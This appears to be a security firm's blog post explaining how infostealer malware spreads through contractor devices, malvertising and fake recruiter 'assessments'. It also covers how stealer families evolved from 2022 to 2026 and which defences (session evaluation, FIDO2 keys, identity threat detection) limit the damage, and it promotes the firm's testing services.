The Silent Heist: Understanding and Defending Against Infostealer Malware

The modern threat landscape has shifted from simple data theft to a sophisticated “Log-as-a-Service” economy, where the primary objective is the total compromise of digital identity. Infostealers are no longer just tools for harvesting passwords; they are the initial engines of access that fuel a significant portion of modern breaches[16]. By extracting session tokens, these malware strains allow attackers to “log in” as a legitimate user, bypassing Multi-Factor Authentication (MFA) and making traditional perimeter defenses irrelevant in many cases.

Infection Vectors and Global Campaigns: The Entry Point

The question of how these malware strains defeat hardened organisational defenses often boils down to a single high-value workstation or a moment of misplaced trust. A primary vector is the “Trusted Contractor” Loophole, as seen in the Okta breach by Lapsus$ [13], where a support engineer’s personal device was compromised by an infostealer.  Another surging tactic is Malvertising and SEO Poisoning, which saw a massive increase through 2025 via techniques like ClickFix [14]. In these cases, employees searching for tools like “AnyDesk” click on sponsored Google Ads leading to cloned sites. These deliver “poisoned” installers that side-load malicious DLLs directly into memory, evading signature-based antivirus. And more recently, the “Developer Recruitment” Scam has targeted technical staff on LinkedIn, where attackers posing as recruiters send “technical assessments” in password-protected archives. When a developer runs a simple command—like npm install—a malicious one-liner executes, immediately scraping .aws/credentials and SSH keys to provide the attacker with instant “living off the land” capabilities.

The Evolution of the Infostealer: 2022–2026

The “New Guard” of infostealers focuses on advanced anti-analysis techniques and platform-agnostic distribution, building on the prolific variants of the early 2020s. Early foundational threats like LokiBot (2022) and RedLine (2022), monitored by Check Point and KPMG respectively, established the “Stealer-as-a-Service” (SaaS) model by targeting browser stores and NFT bots to fuel credential-stuffing markets [1][7]. By 2023, Agent Tesla and Vidar introduced more sophisticated propagation, with Fortinet observing Agent Tesla’s use of process hollowing to exfiltrate data via SMTP, effectively acting as a precursor for targeted corporate espionage [6][2].

Vulnerabilities Frequently Seen in KMSEC Testing

In our offensive security assessments, KMSEC frequently identifies critical vectors that remain undefended even in “mature” environments:

• Web Portal Uploads and Staging: Organizations often assume that image formats or PDFs are inherently innocent. However, we consistently find that web servers (Apache/Nginx) are often neglected as potential as staging platforms to store and propagate malware especially given the lax scrutinisation that web uploads tend to have.  Beyond the technical risk, there is a severe legal risk; an open upload server can be used to host illegal materials, embroiling the organization in criminal investigations. To remediate this, organizations should try enforce a blend of the following: (i) implement automated scanning of all uploads, (ii) strictly limit content upload functionality to specific file types, and (iii) perform frequent inspections and purges of upload storage.

• Mobile Broadcast and Path Trust: In our mobile testing, we find that applications often trust the source of broadcasts too readily and place excessive trust in file path names. This leads to vectors where an attacker-controlled app can send a malicious intent to a privileged app, forcing it to perform unauthorized actions or leak sensitive data.

• Developer Machine Vulnerability: With the surge in targeted developer attacks, we have observed that hacking a single developer machine is far easier and more lucrative than attacking a hardened frontend server. Developers often hold the “keys to the kingdom”—2FA recovery codes and authentication material—which are primary targets for modern infostealers.

The Ripple Effect: Beyond the Initial Event

The impact of an infostealer is rarely a one-time event. Once a developer machine or a personal device is compromised, it opens up a permanent backdoor into the infrastructure. These breaches often “haunt” an organization months later; even after a password is changed, the harvested session tokens or AWS keys might still be valid, allowing for persistent, quiet exfiltration of source code and proprietary data. The compromise of a personal machine used for remote work can bypass the most expensive corporate firewalls, as the “infection” is carried directly into the authenticated session.

Organizations must move beyond simple password resets to survive. (1) Many firms now implement Continuous Access Evaluation (CAE), which terminates active sessions if a device’s security posture changes—such as when an EDR is disabled [8]. (2) Transitioning to FIDO2/WebAuthn hardware keys is critical, as these are cryptographically bound to specific domains, making phished credentials useless [10]. (3) Organizations are also adopting Identity Threat Detection and Response (ITDR) to monitor for suspicious token reuse from unauthorized IP addresses.

KMSEC helps bridge these gaps through Security Awareness Assessments that test employees against the exact lures used by groups like Lumma. Our Manual Penetration Testing identifies the over-scoped IAM roles and “hidden doors” that allow an attacker to move laterally after an initial compromise. By closing these pathways, KMSEC ensures that an infostealer infection remains a contained incident rather than a catastrophic corporate breach.

References

1. Check Point (2022) LokiBot Malware. Available at: https://www.checkpoint.com/cyber-hub/threat-prevention/what-is-malware/lokibot-malware/ (Accessed: 3 April 2026).
2. Check Point (2023) What is Vidar Malware? Available at: https://www.checkpoint.com/press-releases/january-2023s-most-wanted-malware/ (Accessed: 3 April 2026).
3. Critical Start (2024) DarkGate Malware Campaign. Available at: https://www.criticalstart.com/resource/darkgate-malware-campaign/ (Accessed: 3 April 2026).
4. Darktrace (2026) The Rise of MaaS & Lumma Info Stealer. Available at: https://darktrace.com/blog/rise-of-maas-lumma (Accessed: 3 April 2026).
5. Flashpoint (2025) Infostealers to Watch in 2025: Katz, Bee, Acreed, and More. Available at: https://flashpoint.io/blog/infostealers-to-watch-2025/ (Accessed: 3 April 2026).
6. Fortinet (2023) Unmasking Agent Tesla. Available at: https://www.fortinet.com/blog/threat-research/unmasking-agent-tesla (Accessed: 3 April 2026).
7. KPMG (2022) RedLine Stealer: A Growing Threat. Available at: https://assets.kpmg.com/content/dam/kpmg/in/pdf/2022/09/redline-stealer.pdf (Accessed: 3 April 2026).
8. Palo Alto Networks Unit 42 (2026) 2026 Global Incident Response Report. Available at: https://unit42.paloaltonetworks.com/ (Accessed: 3 April 2026).
9. Pen Test Partners (2025) 2025, the year of the Infostealer. Available at: https://www.pentestpartners.com/security-blog/ (Accessed: 3 April 2026).
10. SpyCloud (2025) 2025 SpyCloud Identity Threat Report. Available at: https://spycloud.com/resource/2025-identity-threat-report/ (Accessed: 3 April 2026).
11. Vectra AI (2025) Infostealers stole 1.8B credentials in 2025: How to defeat them. Available at: https://www.vectra.ai/blog/infostealers-2025-report (Accessed: 3 April 2026).
12. DEV-0537 criminal actor targeting organizations for data exfiltration and destruction – (Accessed: 3 April 2026) https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ 
13. Updated Okta Statement on LAPSUS$ 2026 – (Accessed: 3 April 2026)  – https://www.okta.com/blog/company-and-culture/updated-okta-statement-on-lapsus/
14. Think before you Click(Fix): Analyzing the ClickFix social engineering technique –  (Accessed: 6 April 2026) https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
15. Anatomy of a Developer Recruitment Scam: A Technical Forensic Analysis – https://www.alexpruteanu.cloud/blog/anatomy-of-a-developer-recruitment-scam
16. Growth of InfoStealer, Ben Sheppard (2025) (Accessed: 06 April 2026) – https://www.researchgate.net/profile/Ben-Sheppard-8/publication/398429801_The_Growth_of_Infostealer_Usage_-_A_Case_Study_of_Lumma_Stealer/links/693622a70c98040d481be5f5/The-Growth-of-Infostealer-Usage-A-Case-Study-of-Lumma-Stealer.pdf